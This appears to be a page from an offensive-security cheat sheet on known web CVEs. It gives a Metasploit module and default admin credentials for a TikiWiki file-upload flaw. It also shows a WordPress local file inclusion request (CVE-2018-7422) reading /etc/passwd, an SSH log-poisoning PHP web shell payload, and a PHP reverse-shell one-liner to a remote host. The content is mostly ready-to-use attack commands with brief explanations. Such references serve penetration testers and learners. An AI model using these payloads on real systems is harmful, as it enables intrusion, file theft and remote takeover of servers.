search
LinkedIn

Known web CVE's

hashtag
TikiWiki File Upload vulnerability

To exploit the TikiWiki File Upload vulnerability, use the following Metasploit command to perform an unrestricted file upload:

# Use unix/webapp/tikiwiki_upload_exec
# If you find this unrestricted file upload, you can use the msfconsole command to exploit it.
# The default login page of tikiwiki is usually admin:admin
Use unix/webapp/tikiwiki_upload_exec

hashtag
Log Poisoning and LFI example CVE-2018-7422 (Wordpress)

# Inject a malicious PHP payload into SSH to store it in the auth log file
Ssh '<?php system($_GET["c"]); ?>@IP'

# Exploit a Local File Inclusion (LFI) vulnerability in WordPress (CVE-2018-7422)
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

# Combine LFI and log poisoning to get a shell, inject PHP reverse shell into a specific machine
ajax_path=var/log/auth.log&c=ifconfig

# PHP code to establish a reverse shell to a remote host
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
LogoGitHub - RoqueNight/LFI---RCE-Cheat-Sheet: Transition form local file inclusion attacks to remote code exectionGitHubchevron-right

Explanation:

  • The Ssh '<?php system($_GET["c"]); ?>@IP' command illustrates injecting a PHP payload to execute commands on the target system via SSH log poisoning.

  • The LFI example shows how to access the /etc/passwd file using a vulnerable WordPress plugin, indicating a directory traversal attack.

  • Combining LFI and log poisoning involves altering application logs to include malicious PHP code, leading to code execution when the log file is included via LFI.

  • The PHP reverse shell command uses socket programming to connect back to an attacker's machine, offering a shell interface for remote command execution.

PreviouscUrl cheatsheetNextJavaScript Obfuscation/Deobfuscation

Last updated